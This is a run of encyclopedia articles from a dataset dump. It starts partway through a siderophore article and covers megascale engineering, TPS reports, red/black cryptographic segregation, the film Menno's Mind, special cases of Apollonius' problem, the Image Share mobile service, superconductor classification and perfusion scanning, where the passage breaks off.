achromobactin. Xanthomonas group of plant pathogens produce xanthoferrin siderophores to scavenge the iron. Like in humans, plants also possess siderophore binding proteins involved in host defense, like the major birch pollen allergen, Bet v 1, which are usually secreted and possess a lipocalin-like structure. Animal pathogens Pathogenic bacteria and fungi have developed the means of survival in animal tissue. They may invade the gastro-intestinal tract (Escherichia, Shigella and Salmonella), the lung (Pseudomonas, Bordetella, Streptococcus and Corynebacterium), skin (Staphylococcus) or the urinary tract (Escherichia and Pseudomonas). Such bacteria may colonise wounds (Vibrio and Staphylococcus) and be responsible for septicaemia (Yersinia and Bacillus). Some bacteria survive for long periods of time in intracellular organelles, for instance Mycobacterium. (see table). Because of this continual risk of bacterial and fungal invasion, animals have developed a number of lines of defence based on immunological strategies, the complement system, the production of iron–siderophore binding proteins and the general "withdrawal" of iron. There are two major types of iron-binding proteins present in most animals that provide protection against microbial invasion – extracellular protection is achieved by the transferrin family of proteins and intracellular protection is achieved by ferritin. Transferrin is present in the serum at approximately 30 μM, and contains two iron-binding sites, each with an extremely high affinity for iron. Under normal conditions it is about 25–40% saturated, which means that any freely available iron in the serum will be immediately scavenged – thus preventing microbial growth. Most siderophores are unable to remove iron from transferrin. Mammals also produce lactoferrin, which is similar to serum transferrin but possesses an even higher affinity for iron. Lactoferrin is present in secretory fluids, such as sweat, tears and milk, thereby minimising bacterial infection. Ferritin is present in the cytoplasm of cells and limits the intracellular iron level to approximately 1 μM. Ferritin is a much larger protein than transferrin and is capable of binding several thousand iron atoms in a nontoxic form. Siderophores are unable to directly mobilise iron from ferritin. In addition to these two classes of iron-binding proteins, a hormone, hepcidin, is involved in controlling the release of iron from absorptive enterocytes, iron-storing hepatocytes and macrophages. Infection leads to inflammation and the release of interleukin-6 (IL-6 ) which stimulates hepcidin expression. In humans, IL-6 production results in low serum iron, making it difficult for invading pathogens to infect. Such iron depletion has been demonstrated to limit bacterial growth in both extracellular and intracellular locations. In addition to "iron withdrawal" tactics, mammals produce an iron –siderophore binding protein, siderochelin. Siderochelin is a member of the lipocalin family of proteins, which while diverse in sequence, displays a highly conserved structural fold, an 8-stranded antiparallel β-barrel that forms a binding site with several adjacent β-strands. Siderocalin (lipocalin 2) has 3 positively charged residues also located in the hydrophobic pocket, and these create a high affinity binding site for iron(III)–enterobactin. Siderocalin is a potent bacteriostatic agent against E. coli. As a result of infection it is secreted by both macrophages and hepatocytes, enterobactin being scavenged from the extracellular space. Medical applications Siderophores have applications in medicine for iron and aluminum overload therapy and antibiotics for improved targeting. Understanding the mechanistic pathways of siderophores has led to opportunities for designing small-molecule inhibitors that block siderophore biosynthesis and therefore bacterial growth and virulence in iron-limiting environments. Siderophores are useful as drugs in facilitating iron mobilization in humans, especially in the treatment of iron diseases, due to their high affinity for iron. One potentially powerful application is to use the iron transport abilities of siderophores to carry drugs into cells by preparation of conjugates between siderophores and antimicrobial agents. Because microbes recognize and utilize only certain siderophores, such conjugates are anticipated to have selective antimicrobial activity. An example is the cephalosporin antibiotic cefiderocol. Microbial iron transport (siderophore)-mediated drug delivery makes use of the recognition of siderophores as iron delivery agents in order to have the microbe assimilate siderophore conjugates with attached drugs. These drugs are lethal to the microbe and cause the microbe to apoptosise when it assimilates the siderophore conjugate. Through the addition of the iron-binding functional groups of siderophores into antibiotics, their potency has been greatly increased. This is due to the siderophore-mediated iron uptake system of the bacteria. Agricultural applications Poaceae (grasses) including agriculturally important species such as barley and wheat are able to efficiently sequester iron by releasing phytosiderophores via their root into the surrounding soil rhizosphere. Chemical compounds produced by microorganisms in the rhizosphere can also increase the availability and uptake of iron. Plants such as oats are able to assimilate iron via these microbial siderophores. It has been demonstrated that plants are able to use the hydroxamate-type siderophores ferrichrome, rhodotorulic acid and ferrioxamine B; the catechol-type siderophores, agrobactin; and the mixed ligand catechol-hydroxamate-hydroxy acid siderophores biosynthesized by saprophytic root-colonizing bacteria. All of these compounds are produced by rhizospheric bacterial strains, which have simple nutritional requirements, and are found in nature in soils, foliage, fresh water, sediments, and seawater. Fluorescent pseudomonads have been recognized as biocontrol agents against certain soil-borne plant pathogens. They produce yellow-green pigments (pyoverdines) which fluoresce under UV light and function as siderophores. They deprive pathogens of the iron required for their growth and pathogenesis. Other metal ions chelated Siderophores, natural or synthetic, can chelate metal ions other than iron ions. Examples include aluminium, gallium, chromium, copper, zinc, lead, manganese, cadmium, vanadium, zirconium, indium, plutonium, berkelium, californium, and uranium. Related processes Alternative means of assimilating iron are surface reduction, lowering of pH, utilization of heme, or extraction of protein-complexed metal. Recent data suggest that iron-chelating molecules with similar properties to siderophores, were produced by marine bacteria under phosphate limiting growth condition. In nature phosphate binds to different type of iron minerals, and therefore it was hypothesized that bacteria can use siderophore-like molecules to dissolve such complex in order to access the phosphate. See also Ionophore Oxalic acid References Further reading Biomolecules Iron metabolism
Siderophore
[ "Chemistry", "Biology" ]
5,143
[ "Natural products", "Organic compounds", "Biomolecules", "Structural biology", "Biochemistry", "Molecular biology" ]
1,065,499
https://en.wikipedia.org/wiki/Megascale%20engineering
Megascale engineering (or macro-engineering) is a form of exploratory engineering concerned with the construction of structures on an enormous scale. Typically these structures are at least in length—in other words, at least one megameter, hence the name. Such large-scale structures are termed megastructures. In addition to large-scale structures, megascale engineering is also defined as including the transformation of entire planets into a human-habitable environment, a process known as terraforming or planetary engineering. This might also include transformation of the surface conditions, changes in the planetary orbit, and structures in orbit intended to modify the energy balance. Astroengineering is the extension of megascale engineering to megastructures on a stellar scale or larger, such as Dyson spheres, Ringworlds, and Alderson disks. Several megascale structure concepts such as Dyson spheres, Dyson swarms, and Matrioshka brains would likely be built upon space-based solar power satellites. Other planetary engineering or interstellar transportation concepts would likely require space-based solar power satellites and the accompanying space logistics infrastructure for their power or construction. Megascale engineering often plays a major part in the plot of science fiction movies and books. The micro-gravity environment of outer space provides several potential benefits for the engineering of these structures. These include minimizing the loads on the structure, the availability of large quantities of raw materials in the form of asteroids, and an ample supply of energy from the Sun. The capabilities to employ these advantages are not yet available, however, so they provide material for science fiction themes. Quite a few megastructures have been designed on paper as exploratory engineering. However, the list of existing and planned megastructures is complicated by the ambiguity in classifying what exactly constitutes a megastructure. By strict definition, no megastructures currently exist (with the space elevator being the only such project under serious consideration). By more lenient definitions, the Great Wall of China () counts as a megastructure. A more complete list of conceptual and existing megastructures, along with a discussion of megastructure criteria, is found under megastructure. Of all the proposed megastructures, only the orbital elevator, the Lofstrom launch loop, and Martian or lunar space elevator concepts could be built using conventional engineering techniques, and are within the grasp of current material science. Carbon nanotubes may have the requisite tensile strength for the more technologically challenging Earth-based space elevator, but creation of nanotubes of the required length is a laboratory exercise, and adequate cable-scale technology has not yet been shown at all. The assembly of structures more massive than a space elevator would likely involve a combination of new engineering techniques, new materials, and new technologies. Such massive construction projects might require the use of self-replicating machines to provide a suitably large "construction crew". The use of nanotechnology might provide both the self-replicating assemblers, and the specialized materials needed for such a project. Nanotechnology is, however, another area of speculative exploratory engineering at this time. See also Kardashev scale Macro-engineering Space manufacturing Stellar engineering References Megastructures Engineering projects Exploratory engineering
Megascale engineering
[ "Technology", "Engineering" ]
693
[ "Exploratory engineering", "nan", "Megastructures" ]
1,065,521
https://en.wikipedia.org/wiki/TPS%20report
A TPS report ("test procedure specification") is a document used by a quality assurance group or individual, particularly in software engineering, that describes the testing procedures and the testing process. Definition The official definition and creation is provided by the Institute of Electrical and Electronics Engineers (IEEE) as follows: In popular culture Office Space Its use in popular culture increased after the comedic 1999 film Office Space. In the movie, multiple managers and coworkers inquire about an error that protagonist Peter Gibbons (played by Ron Livingston) makes in omitting a cover sheet to send with his "TPS reports". It is used by Gibbons as an example that he has eight different bosses to whom he directly reports. According to the film's writer and director Mike Judge, the abbreviation stood for "Test Program Set" in the movie. After Office Space, "TPS report" has come to connote pointless, mindless paperwork, and an example of "literacy practices" in the work environment that are "meaningless exercises imposed upon employees by an inept and uncaring management" and "relentlessly mundane and enervating". Other references and allusions In the 1991 film Don't Tell Mom the Babysitter's Dead the main character Sue Ellen (portrayed by Christina Applegate) is expected to know how to complete TPS reports. Once handed the insurmountable of paperwork to complete, she passes the work off to a very willing co-worker Cathy (portrayed by Kimmy Robertson) who handles the reports, but is intercepted by Sue Ellen's nemesis who attempts to use it as leverage as a means to get the main character fired. In King of the Hill (also produced by Mike Judge), Kahn is being chewed out, then remarks to his boss "No sir, I filed my TPS report yesterday." The 2015 puzzle video game Please, Don't Touch Anything featured the question "What is a TPS Report?" as one of many hidden clues that lead to a unique ending. In Lost season 1, episode 4, John Locke's boss says "Locke, I told you I need those TPS reports done by noon today." In Ralph Breaks the Internet, a TPS report is visibly hanging in one of the accounting department cubicles during Ralph's viral video montage. While Test Procedure Specification reports are not functionally relevant within accounting, this usage shows how the term has grown to symbolize all kinds of meaningless memoranda. In Borderlands 2, a legendary weapon is named the "Actualizer" with a flavor text description of "We need to talk about your DPS reports", parodying the corporate term by replacing it with the common gaming abbreviation for "Damage Per Second". In The Mandalorian, TPS reports are mentioned in the episode "Chapter 15: The Believer" as work to do by the character Migs Mayfeld when attempting to avoid an imperial officer, in a reference to Office Space. The TV series The Family Man features a scene in series 2, episode 1 in which the manager of the protagonist asks him to "start thinking about your TPS reports!", in amongst other apparent references to Office Space. In the NCIS episode "Starting Over", Gary Cole's Agent Parker mentions his least favorite paperwork being TPS reports. When McGee corrects him telling him they're "TBS reports", he says, "Ah, old habits, weird", then takes a sip of coffee, paying homage to his Office Space character, Bill Lumbergh. In Season 4, Episode 10 ("High") of Rescue Me, Janet Gavin starts a new job and hands off a TPS report at the beginning of the scene. In the Terry Tate: Office Linebacker, Terry Tate yells, "You know you need a coversheet on your TPS reports Richard!" In Season 2, during the first segment of the 28th episode of Puppy Dog Pals titled "Take Your Dog to Work Day", while Bingo and Rolly are playing office, Bingo says "One sec Rolly, these TPS reports aren't gonna fix themselves." In Doom 2016, some control consoles in early levels reference TPS Reports. Early in Black Mesa, protagonist Gordon Freeman encounters two scientists discussing TPS reports. References External links Printable PDF TPS Report Software testing Popular culture neologisms Computer humour
TPS report
[ "Engineering" ]
892
[ "Software engineering", "Software testing" ]
1,065,533
https://en.wikipedia.org/wiki/Red/black%20concept
The red/black concept, sometimes called the red–black architecture or red/black engineering, refers to the careful segregation in cryptographic systems of signals that contain sensitive or classified plaintext information (red signals) from those that carry encrypted information, or ciphertext (black signals). Therefore, the red side is usually considered the internal side, and the black side the more public side, with often some sort of guard, firewall or data-diode between the two. In NSA jargon, encryption devices are often called blackers, because they convert red signals to black. TEMPEST standards spelled out in Tempest/2-95 specify shielding or a minimum physical distance between wires or equipment carrying or processing red and black signals. Different organizations have differing requirements for the separation of red and black fiber-optic cables. Red/black terminology is also applied to cryptographic keys. Black keys have themselves been encrypted with a "key encryption key" (KEK) and are therefore benign. Red keys are not encrypted and must be treated as highly sensitive material. Red/Gray/Black The NSA's Commercial Solutions for Classified (CSfC) program, which uses two layers of independent, commercial off-the-shelf cryptographic products to protect classified information, includes a red/gray/black concept. In this extension of the red/black concept, the separated gray compartment handles data that has been encrypted only once, which happens at the red/gray boundary. The gray/black interface adds or removes a second layer of encryption. See also Computer security Secure by design Security engineering References Cryptography Secure communication Security engineering
Red/black concept
[ "Mathematics", "Engineering" ]
336
[ "Systems engineering", "Cybersecurity engineering", "Cryptography", "Security engineering", "Applied mathematics" ]
16,429,700
https://en.wikipedia.org/wiki/Menno%27s%20Mind
Menno's Mind is a 1997 film directed by Jon Kroll for Showtime. The film stars Billy Campbell, Stephanie Romanov, Corbin Bernsen, and Michael Dorn. The screenplay was written by Mark Valenti. Plot synopsis Campbell plays the titular Menno, a computer programmer at a virtual reality resort that allows visitors to escape into simulations of their fantasies. The technology is being employed for election fraud by the chief of security (Corbin Bensen). The resistance leader recruits Menno to fight the corruption. References External links 1997 films Films about computing Films scored by Christopher Franke 1990s English-language films 1997 science fiction films English-language science fiction films
Menno's Mind
[ "Technology" ]
135
[ "Works about computing", "Films about computing" ]
16,429,785
https://en.wikipedia.org/wiki/Special%20cases%20of%20Apollonius%27%20problem
In Euclidean geometry, Apollonius' problem is to construct all the circles that are tangent to three given circles. Special cases of Apollonius' problem are those in which at least one of the given circles is a point or line, i.e., is a circle of zero or infinite radius. The nine types of such limiting cases of Apollonius' problem are to construct the circles tangent to: three points (denoted PPP, generally 1 solution) three lines (denoted LLL, generally 4 solutions) one line and two points (denoted LPP, generally 2 solutions) two lines and a point (denoted LLP, generally 2 solutions) one circle and two points (denoted CPP, generally 2 solutions) one circle, one line, and a point (denoted CLP, generally 4 solutions) two circles and a point (denoted CCP, generally 4 solutions) one circle and two lines (denoted CLL, generally 8 solutions) two circles and a line (denoted CCL, generally 8 solutions) In a different type of limiting case, the three given geometrical elements may have a special arrangement, such as constructing a circle tangent to two parallel lines and one circle. Historical introduction Like most branches of mathematics, Euclidean geometry is concerned with proofs of general truths from a minimum of postulates. For example, a simple proof would show that at least two angles of an isosceles triangle are equal. One important type of proof in Euclidean geometry is to show that a geometrical object can be constructed with a compass and an unmarked straightedge; an object can be constructed if and only if (iff) (something about no higher than square roots are taken). Therefore, it is important to determine whether an object can be constructed with compass and straightedge and, if so, how it may be constructed. Euclid developed numerous constructions with compass and straightedge. Examples include: regular polygons such as the pentagon and hexagon, a line parallel to another that passes through a given point, etc. Many rose windows in Gothic Cathedrals, as well as some Celtic knots, can be designed using only Euclidean constructions. However, some geometrical constructions are not possible with those tools, including the heptagon and trisecting an angle. Apollonius contributed many constructions, namely, finding the circles that are tangent to three geometrical elements simultaneously, where the "elements" may be a point, line or circle. Rules of Euclidean constructions In Euclidean constructions, five operations are allowed: Draw a line through two points Draw a circle through a point with a given center Find the intersection point of two lines Find the intersection points of two circles Find the intersection points of a line and a circle The initial elements in a geometric construction are called the "givens", such as a given point, a given line or a given circle. Example 1: Perpendicular bisector To construct the perpendicular bisector of the line segment between two points requires two circles, each centered on an endpoint and passing through the other endpoint (operation 2). The intersection points of these two circles (operation 4) are equidistant from the endpoints. The line through them (operation 1) is the perpendicular bisector. Example 2: Angle bisector To generate the line that bisects the angle between two given rays requires a circle of arbitrary radius centered on the intersection point P of the two lines (2). The intersection points of this circle with the two given lines (5) are T1 and T2. Two circles of the same radius, centered on T1 and T2, intersect at points P and Q. The line through P and Q (1) is an angle bisector. Rays have one angle bisector; lines have two, perpendicular to one another. Preliminary results A few basic results are helpful in solving special cases of Apollonius' problem. Note that a line and a point can be thought of as circles of infinitely large and infinitely small radius, respectively. A circle is tangent to a point if it passes through the point, and tangent to a line if they intersect at a single point P or if the line is perpendicular to a radius drawn from the circle's center to P. Circles tangent to two given points must lie on the perpendicular bisector. Circles tangent to two given lines must lie on the angle bisector. Tangent line to a circle from a given point draw semicircle centered on the midpoint between the center of the circle and the given point. Power of a point and the harmonic mean The radical axis of two circles is the set of points of equal tangents, or more generally, equal power. Circles may be inverted into lines and circles into circles. If two circles are internally tangent, they remain so if their radii are increased or decreased by the same amount. Conversely, if two circles are externally tangent, they remain so if their radii are changed by the same amount in opposite directions, one increasing and the other decreasing. Types of solutions Type 1: Three points PPP problems generally have a single solution. As shown above, if a circle passes through two given points P1 and P2, its center must lie somewhere on the perpendicular bisector line of the two points. Therefore, if the solution circle passes through three given points P1, P2 and P3, its center must lie on the perpendicular bisectors of , and . At least two of these bisectors must intersect, and their intersection point is the center of the solution circle. The radius of the solution circle is the distance from that center to any one of the three given points. Type 2: Three lines LLL problems generally offer 4 solutions. As shown above, if a circle is tangent to two given lines, its center must lie on one of the two lines that bisect the angle between the two given lines. Therefore, if a circle is tangent to three given lines L1, L2, and L3, its center C must be located at the intersection of the bisecting lines of the three given lines. In general, there are four such points, giving four different solutions for the LLL Apollonius problem. The radius of each solution is determined by finding a point of tangency T, which may be done by choosing one of the three intersection points P between the given lines; and drawing a circle centered on the midpoint of C and P of diameter equal to the distance between C and P. The intersections of that circle with the intersecting given lines are the two points of tangency. Type 3: One point, two lines PLL problems generally have 2 solutions. As shown above, if a circle is tangent to two given lines, its center must lie on one of the two lines that bisect the angle between the two given lines. By symmetry, if such a circle passes through a given point P, it must also pass through a point Q that is the "mirror image" of P about the angle bisector. The two solution circles pass through both P and Q, and their radical axis is the line connecting those two points. Consider point G at which the radical axis intersects one of the two given lines. Since, every point on the radical axis has the same power relative to each circle, the distances and to the solution tangent points T1 and T2, are equal to each other and to the product Thus, the distances are both equal to the geometric mean of and . From G and this distance, the tangent points T1 and T2 can be found. Then, the two solution circles are the circles that pass through the three points (P, Q, T1) and (P, Q, T2), respectively. Type 4: Two points, one line PPL problems generally have 2 solutions. If a line m drawn through the given points P and Q is parallel to the given line l, the tangent point T of the circle with l is located at the intersection of the perpendicular bisector of with l. In that case, the sole solution circle is the circle that passes through the three points P, Q and T. If the line m is not parallel to the given line l, then it intersects l at a point G. By the power of a point theorem, the distance from G to a tangent point T must equal the geometric mean Two points on the given line L are located at a distance from the point G, which may be denoted as T1 and T2. The two solution circles are the circles that pass through the three points (P, Q, T1) and (P, Q, T2), respectively. Compass and straightedge construction The two circles in the Two points, one line problem where the line through P and Q is not parallel to the given line l, can be constructed with compass and straightedge by: Draw the line m through the given points P and Q . The point G is where the lines l and m intersect Draw circle C that has PQ as diameter. Draw one of the tangents from G to circle C. point A is where the tangent and the circle touch. Draw circle D with center G through A. Circle D cuts line l at the points T1 and T2. One of the required circles is the circle through P, Q and T1. The other circle is the circle through P, Q and T2. The fastest construction (if intersections of l with both (PQ) and the central perpendicular to [PQ] are available; based on Gergonne’s approach). Draw a line m through P and Q intersecting l at G. Draw a perpendicular n through the middle of [PQ] intersecting l at O. Draw a circle w centered at O with radius |OP|=|OQ|. Draw a circle W with [OG] as a diameter intersecting w at M1 and M2. Draw a circle v centered at G with radius |GM1|=|GM2| intersecting l at T1 and T2. The circles passing through P, Q, T1 and P, Q, T2 are solutions. The universal construction (if intersections of l with either (PQ) or the central perpendicular to [PQ] are unavailable or do not exist). Draw a perpendicular n through the middle of [PQ] (point R). Draw a perpendicular k to l through P or Q intersecting l at K. Draw a circle w centered at R with radius |RK|. Draw two lines n1 and n2 passing through P and Q parallel to n and intersecting w at points A1, A2 and B1, B2, respectively. Draw two lines (A1B1) and (A2B2) intersecting l at T1 and T2, respectively. The circles passing through P, Q, T1 and P, Q, T2 are solutions. Type 5: One circle, two points CPP problems generally have 2 solutions. Consider a circle centered on one given point P that passes through the second point, Q. Since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. The same inversion transforms Q into itself, and (in general) the given circle C into another circle c. Thus, the problem becomes that of finding a solution line that passes through Q and is tangent to c, which was solved above; there are two such lines. Re-inversion produces the two corresponding solution circles of the original problem. Type 6: One circle, one line, one point CLP problems generally have 4 solutions. The solution of this special case is similar to that of the CPP Apollonius solution. Draw a circle centered on the given point P; since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. In general, the same inversion transforms the given line L and given circle C into two new circles, c1 and c2. Thus, the problem becomes that of finding a solution line tangent to the two inverted circles, which was solved above. There are four such lines, and re-inversion transforms them into the four solution circles of the Apollonius problem. Type 7: Two circles, one point CCP problems generally have 4 solutions. The solution of this special case is similar to that of CPP. Draw a circle centered on the given point P; since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. In general, the same inversion transforms the given circle C1 and C2 into two new circles, c1 and c2. Thus, the problem becomes that of finding a solution line tangent to the two inverted circles, which was solved above. There are four such lines, and re-inversion transforms them into the four solution circles of the original Apollonius problem. Type 8: One circle, two lines CLL problems generally have 8 solutions. This special case is solved most easily using scaling. The given circle is shrunk to a point, and the radius of the solution circle is either decreased by the same amount (if an internally tangent solution) or increased (if an externally tangent circle). Depending on whether the solution circle is increased or decreased in radii, the two given lines are displaced parallel to themselves by the same amount, depending on which quadrant the center of the solution circle falls. This shrinking of the given circle to a point reduces the problem to the PLL problem, solved above. In general, there are two such solutions per quadrant, giving eight solutions in all. Type 9: Two circles, one line CCL problems generally have 8 solutions. The solution of this special case is similar to CLL. The smaller circle is shrunk to a point, while adjusting the radii of the larger given circle and any solution circle, and displacing the line parallel to itself, according to whether they are internally or externally tangent to the smaller circle. This reduces the problem to CLP. Each CLP problem has four solutions, as described above, and there are two such problems, depending on whether the solution circle is internally or externally tangent to the smaller circle. Special cases with no solutions An Apollonius problem is impossible if the given circles are nested, i.e., if one circle is completely enclosed within a particular circle and the remaining circle is completely excluded. This follows because any solution circle would have to cross over the middle circle to move from its tangency to the inner circle to its tangency with the outer circle. This general result has several special cases when the given circles are shrunk to points (zero radius) or expanded to straight lines (infinite radius). For example, the CCL problem has zero solutions if the two circles are on opposite sides of the line since, in that case, any solution circle would have to cross the given line non-tangentially to go from the tangent point of one circle to that of the other. See also Problem of Apollonius Compass and straightedge constructions References Benjamin Alvord (1855) Tangencies of Circles and of Spheres, Smithsonian Contributions, volume 8, from Google Books. Euclidean plane geometry
Special cases of Apollonius' problem
[ "Mathematics" ]
3,080
[ "Planes (geometry)", "Euclidean plane geometry" ]
16,431,173
https://en.wikipedia.org/wiki/Image%20Share
Image Share is a service for sharing images between users during a mobile phone call. It has been specified for use in a 3GPP-compliant cellular network by the GSM Association in the PRD IR.79 Image Share Interoperability Specification. According to the specification, "The terminal interoperable Image Share service allows users to share Images between them over PS connection with ongoing CS call, thus enhancing and enriching end-users voice communication." An Image Share session begins by end-users setting up a normal circuit switched (CS) voice call. After the voice call is set up, terminals perform a registration to an IMS core system with a packet switched (PS) connection. Then based on successful capability negotiation between the terminals, the end-user will be presented with an option in terminal UI offering the possibility of sharing one or several images. If this is selected, then these images are transferred between the Image Share software clients located in the mobile phones using the PS connection and the recipient is able to see the images. During this process the normal CS voice session has been ongoing continuously. Image Share can be seen as a kind of spin-off from the Video Share mobile phone service. Video Share is commercially launched for example by AT&T in USA, but Image Share is not yet available from any mobile operator/service provider. Technical features Interoperable multi-vendor compliant service, i.e. Image Share works across different mobile phones from various vendors (as long as they have the necessary software client installed) IMS service, i.e. 3GPP compliant IMS core system required for the service provider/operator offering Image Share CSI (CS and IMS combinational) service compliant to 3GPP specifications TS 22.279, TS 23.279 and TS 24.279, i.e. CS voice call set up required prior to sharing the images SIP used for signaling via IMS, i.e. registration for the service is performed using the capabilities offered by IMS platform with SIP protocol MSRP (Message Session Relay Protocol, RFC 4975) used for transporting media between the mobile phones IETF File transfer mechanisms utilized for negotiating shared images between offerer and answerer via SIP/SDP offer/answer model Capability query performed using SIP OPTIONS method between the mobile phones to find out whether the recipient is Image Share capable Peer-to-peer service, i.e. no server required in the network for sharing the images Both live and pre-stored images can be shared between the participating mobile phones Requires 3G or EDGE DTM (Dual Transfer Mode) mobile network Usage According to GSMA press release interoperability between different Image Share clients was successfully tested in a multi-vendor trial in May 2007, including interworking between multiple networks. No mobile operator has launched Image Share so far (as of March 2008). See also Video Share, which (re)uses similar basic architecture IM, especially OMA SIMPLE IM which also utilizes MSRP for transporting media MMS, which also provides the means for users to exchange images between mobile phones Multiple different file/image sharing applications & services available from various companies References GSM Association PRD IR.79 Image Share Interoperability Specification IETF RFC 4975 Message Session Relay Protocol 3GPP TS 22.279 Combinied Circuit Switched (CS) and IP Multimedia Subsystem (IMS) sessions; Stage 1 3GPP TS 23.279 Combining Circuit Switched (CS) and IP Multimedia Subsystem (IMS) services; Stage 2 3GPP TS 24.279 Combining Circuit Switched (CS) and IP Multimedia Subsystem (IMS) services; Stage 3 IMS services
Image Share
[ "Technology" ]
747
[ "IMS services" ]
16,434,453
https://en.wikipedia.org/wiki/Superconductor%20classification
Superconductors can be classified in accordance with several criteria that depend on physical properties, current understanding, and the expense of cooling them or their material. By their magnetic properties Type I superconductors: those having just one critical field (Hc) and changing abruptly from one state to the other when it is reached. Type II superconductors: having two critical fields, Hc1 and Hc2, being a perfect superconductor under the lower critical field (Hc1) and leaving completely the superconducting state to a normally conducting state above the upper critical field (Hc2), being in a mixed state when between the critical fields. Type-1.5 superconductors: multicomponent superconductors characterized by two or more coherence lengths. By their agreement with conventional models Conventional superconductors: those which can be fully explained with BCS theory or related theories. Unconventional superconductors: those which fail to be explained using such theories, such as: Heavy fermion superconductors This criterion is useful as BCS theory has successfully explained the properties of conventional superconductors since 1957, yet there have been no satisfactory theories to fully explain unconventional superconductors. In most cases conventional superconductors are type I, but there are exceptions such as niobium, which is both conventional and type II. By their critical temperature Low-temperature superconductors, or LTS: those whose critical temperature is below 77 K. High-temperature superconductors, or HTS: those whose critical temperature is above 77 K. Room-temperature superconductors: those whose critical temperature is above 273 K. 77 K is used as the demarcation point to emphasize whether or not superconductivity in the materials can be achieved with liquid nitrogen (whose boiling point is 77K), which is much more feasible than liquid helium (an alternative to achieve the temperatures needed to get low-temperature superconductors). By material constituents and structure Some pure elements, such as lead or mercury (but not all, as some never reach the superconducting phase). Some allotropes of carbon, such as fullerenes, nanotubes, or diamond. Most superconductors made of pure elements are type I (except niobium, technetium, vanadium, silicon, and the above-mentioned carbon allotropes). Alloys, such as Niobium-titanium (NbTi), whose superconducting properties were discovered in 1962. Ceramics (often insulators in the normal state), which include Cuprates i.e. copper oxides (often layered, not isotropic) The YBCO family, which are several yttrium-barium-copper oxides, especially YBa2Cu3O7. They are arguably the most famous high-temperature superconductors. Nickelates (RNiO2 R=Rare earth ion) where Sr-doped infinite-layer nickelate NdNiO2 undergo a superconducting transition at 9-15 K. In the family of Ruddlesden-Popper phase analog Nd6Ni5O12 (n=5) becomes superconducting at 13 K. Note that this is not a complete list and is a topic of current research. Iron-based superconductors, including the oxypnictides. Magnesium diboride (MgB2), whose critical temperature is 39K, being the conventional superconductor with the highest known temperature. non-cuprate oxides such as BKBO. Palladates – palladium compounds. others, such as the "metallic" compounds and which are both superconductors below . See also Conventional superconductor covalent superconductors List of superconductors High-temperature superconductivity Room temperature superconductor Superconductivity Technological applications of superconductivity Timeline of low-temperature technology Type-I superconductor Type-II superconductor Type-1.5 superconductor Heavy fermion superconductor Organic superconductor Unconventional superconductor References Superconductivity
Superconductor classification
[ "Physics", "Materials_science", "Engineering" ]
877
[ "Physical quantities", "Superconductivity", "Materials science", "Condensed matter physics", "Electrical resistance and conductance" ]
16,434,531
https://en.wikipedia.org/wiki/Perfusion%20scanning
Perfusion is the passage of fluid through the lymphatic system or blood vessels to an organ or a tissue. The practice of perfusion scanning is the process by which this perfusion can be observed, recorded and quantified. The term perfusion scanning encompasses a wide range of medical imaging modalities. Applications With the ability to ascertain data on the blood flow to vital organs such as the heart and the brain, doctors are able to make quicker and more accurate choices on treatment for patients. Nuclear medicine has been leading perfusion scanning for some time, although the modality has certain pitfalls. It is often dubbed 'unclear medicine' as the scans produced may appear to the untrained eye as just fluffy and irregular patterns. More recent developments in CT and MRI have meant clearer images and solid data, such as graphs depicting blood flow, and blood volume charted over a fixed period of time. Methods Microspheres CT MRI Nuclear medicine or NM Microsphere perfusion Using radioactive microspheres is an older method of measuring perfusion than the more recent imaging techniques. This process involves labeling microspheres with radioactive isotopes and injecting these into the test subject. Perfusion measurements are taken by comparing the radioactivity of selected regions within the body to radioactivity of blood samples withdrawn at the time of microsphere injection. Later, techniques were developed to substitute radioactively labeled microspheres for fluorescent microspheres. CT perfusion The method by which perfusion to an organ measured by CT is still a relatively new concept, although the first dynamic imaging studies of cerebral perfusion were reported on in 1979 by E. Ralph Heinz et al. from the Duke University Medical Center, Durham, North Carolina, itself citing a reference on a presentation on "Dynamic Computed Tomography" at the XI. Symposium Neuroradiologicum in Wiesbaden, June 4–10, 1978, which has not been submitted to the conference proceedings. The original framework and principles for CT perfusion analysis were concretely laid out in 1980 by Leon Axel at University of California San Francisco. It is most commonly carried out for neuroimaging using dynamic sequential scanning of a pre-selected region of the brain during the injection of a bolus of iodinated contrast material as it travels through the vasculature. Various mathematical models can then be used to process the raw temporal data to ascertain quantitative information such as rate of cerebral blood flow (CBF) following an ischemic stroke or aneurysmal subarachnoid hemorrhage. Practical CT perfusion as performed on modern CT scanners was first described by Ken Miles, Mike Hayball and Adrian Dixon from Cambridge UK and subsequently developed by many individuals including Matthias Koenig and Ernst Klotz in Germany, and later by Max Wintermark in Switzerland and Ting-Yim Lee in Ontario, Canada. MRI perfusion There are different techniques of Perfusion MRI, the most common being dynamic contrast-enhanced (DCE), dynamic susceptibility contrast imaging (DSC), and arterial spin labelling (ASL). In DSC, Gadolinium contrast agent (Gd) is injected (usually intravenously) and a time series of fast T2*-weighted images is acquired. As Gadolinium passes through the tissues, it induces a reduction of T2* in the nearby water protons; the corresponding decrease in signal intensity observed depends on the local Gd concentration, which may be considered a proxy for perfusion. The acquired time series data are then postprocessed to obtain perfusion maps with different parameters, such as BV (blood volume), BF (blood flow), MTT (mean transit time) and TTP (time to peak). DCE-MRI also uses intravenous Gd contrast, but the time series is T1-weighted and gives increased signal intensity corresponding to local Gd concentration. Modelling of DCE-MRI yields parameters related to vascular permeability and extravasation transfer rate (see main article on perfusion MRI). Arterial spin labelling (ASL) has the advantage of not relying on an injected contrast agent, instead inferring perfusion from a drop in signal observed in the imaging slice arising from inflowing spins (outside the imaging slice) having been selectively saturated. A number of ASL schemes are possible, the simplest being flow alternating inversion recovery (FAIR) which requires two acquisitions of identical parameters with the exception of the out-of-slice saturation; the difference in the two images is theoretically only from inflowing spins, and may be considered a 'perfusion map'. NM perfusion Nuclear medicine uses radioactive isotopes for the diagnosis and treatment of patients. Whereas radiology provides data mostly on structure, nuclear medicine provides complementary information about function. All nuclear medicine scans give information to the referrering clinician on the function of the system they are imaging. Specific techniques used are generally either of the following: Single-photon emission computed tomography (SPECT), which creates 3-dimensional images of the target organ or organ system. Scintigraphy, creating 2-dimensional images. Uses of NM perfusion scanning include Ventilation/perfusion scans of lungs, myocardial perfusion imaging of the heart, and functional brain imaging. Ventilation/perfusion scans Ventilation/perfusion scans, sometimes called a VQ (V=Ventilation, Q=perfusion) 